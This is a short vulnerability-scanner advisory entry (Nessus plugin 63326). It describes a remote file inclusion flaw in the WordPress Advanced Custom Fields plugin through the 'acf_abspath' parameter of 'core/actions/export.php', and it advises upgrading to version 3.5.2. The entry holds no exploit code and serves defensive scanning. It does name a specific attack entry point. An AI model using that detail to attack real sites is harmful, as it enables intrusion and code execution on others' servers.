Advanced Custom Fields Plugin for WordPress 'acf_abspath' Parameter Remote File Inclusion
High Nessus Plugin ID 63326
SynopsisThe remote web server contains a PHP application that is afffected by a remote file inclusion attack.
DescriptionThe version of the Advanced Custom Fields plugin for WordPress installed on the remote host fails to properly sanitize user-supplied input to the 'acf_abspath' parameter of its 'core/actions/export.php' script. A remote, unauthenticated attacker can exploit this issue to view arbitrary files or execute arbitrary PHP code, possibly taken from third-party hosts, on the remote host.
SolutionUpgrade to Advanced Custom Fields version 3.5.2 or later.